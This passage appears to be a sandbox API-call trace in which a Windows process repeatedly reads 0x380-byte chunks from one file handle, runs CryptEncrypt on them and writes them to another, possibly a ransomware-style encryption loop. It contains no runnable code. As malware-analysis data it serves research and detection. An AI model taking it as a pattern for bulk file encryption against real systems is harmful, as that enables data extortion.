lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.701] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.701] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.702] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.702] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.703] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.703] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.703] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.703] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.703] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.703] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.704] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.704] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.705] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.705] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.706] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.706] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.706] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.706] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.706] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.706] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.707] CryptEncrypt (in: hKey=0x2e7c380, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.707] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 